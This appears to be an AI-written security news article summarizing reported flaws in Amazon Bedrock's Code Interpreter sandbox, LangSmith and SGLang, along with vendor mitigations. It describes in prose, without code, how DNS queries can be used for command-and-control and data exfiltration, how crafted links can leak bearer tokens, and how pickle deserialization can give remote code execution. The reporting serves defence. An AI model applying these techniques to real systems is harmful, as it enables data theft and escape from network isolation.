Ethical Hacking News
Recently discovered vulnerabilities in Amazon's Bedrock, LangSmith, and SGLang highlight the need for organizations to prioritize security measures when working with AI platforms. The identified flaws pose significant risks to sensitive data and unauthorized access. Understanding these vulnerabilities is essential for ensuring the safety of AI-powered systems.
An attacker can exploit DNS query mechanism in sandbox mode to establish command-and-control channel, bypass network isolation controls, and exfiltrate sensitive data from AWS resources. The issue arises from the Amazon Bedrock AgentCore Code Interpreter's sandbox mode allowing outbound DNS queries that can be exploited by attackers. A vulnerability in LangSmith framework allows attackers to steal users' bearer tokens and other sensitive information through social engineering techniques. The SGLang framework is affected by unauthenticated remote code execution vulnerabilities, including a ZeroMQ broker vulnerability. Amazon recommends using VPC mode instead of sandbox mode for complete network isolation and suggests the use of a DNS firewall to filter outbound DNS traffic. Experts urge organizations to take immediate action to secure their AI platforms against these vulnerabilities.
Cybersecurity researchers have recently uncovered a significant vulnerability in Amazon's Bedrock, LangSmith, and SGLang - three popular artificial intelligence (AI) platforms used by organizations worldwide. The vulnerabilities were discovered through a thorough analysis of the code execution environments of these AI platforms.
According to the report published by BeyondTrust, an attacker can exploit the DNS query mechanism in sandbox mode to establish a command-and-control channel, bypass network isolation controls, and exfiltrate sensitive data from AWS resources. This means that even if an organization has implemented robust security measures, they may still be vulnerable to data theft and unauthorized access.
The issue arises from the fact that the Amazon Bedrock AgentCore Code Interpreter's sandbox mode allows outbound DNS queries, which can be exploited by attackers to set up a bidirectional communication channel using DNS queries and responses. This enables the exfiltration of sensitive information through DNS queries if the IAM role attached to the AI platform has permissions to access AWS resources.
The report also highlights that this vulnerability is not limited to AWS resources but can also be used to deliver additional payloads that are fed to the Code Interpreter, causing it to poll a command-and-control (C2) server for commands stored in DNS A records and execute them. This means that an attacker could potentially use this vulnerability to gain control over an AI platform and access sensitive data.
The LangSmith framework is also vulnerable to a high-severity security flaw, characterized as URL parameter injection stemming from a lack of validation on the baseUrl parameter. This allows attackers to steal users' bearer tokens, user IDs, and workspace IDs transmitted to a server under their control through social engineering techniques like tricking victims into clicking on specially crafted links.
The SGLang framework is also affected by several security vulnerabilities, including an unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker. These vulnerabilities can potentially trigger unsafe pickle deserialization and result in remote code execution if successfully exploited.
In response to these vulnerabilities, Amazon has recommended that customers use VPC mode instead of sandbox mode for complete network isolation. They have also suggested the use of a DNS firewall to filter outbound DNS traffic.
Experts are urging organizations to take immediate action to secure their AI platforms against these vulnerabilities. This includes inventorying all active AgentCore Code Interpreter instances and migrating those handling critical data from Sandbox mode to VPC mode.
Jason Soroko, senior fellow at Sectigo, has emphasized the importance of rigorous auditing and enforcing the principle of least privilege to restrict the blast radius of any potential compromise.
As AI platforms become increasingly ubiquitous in organizations worldwide, it is essential that we take these vulnerabilities seriously and prioritize security measures to prevent data breaches and unauthorized access. The recent discovery of vulnerabilities in Amazon's Bedrock, LangSmith, and SGLang serves as a stark reminder of the need for robust security protocols when working with AI.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Critical-Look-at-Amazons-AI-Flaws-What-You-Need-to-Know-ehn.shtml
https://thehackernews.com/2026/03/ai-flaws-in-amazon-bedrock-langsmith.html
https://aws.amazon.com/blogs/security/hardening-the-rag-chatbot-architecture-powered-by-amazon-bedrock-blueprint-for-secure-design-and-anti-pattern-migration/
Published: Tue Mar 17 12:54:17 2026 by llama3.2 3B Q4_K_M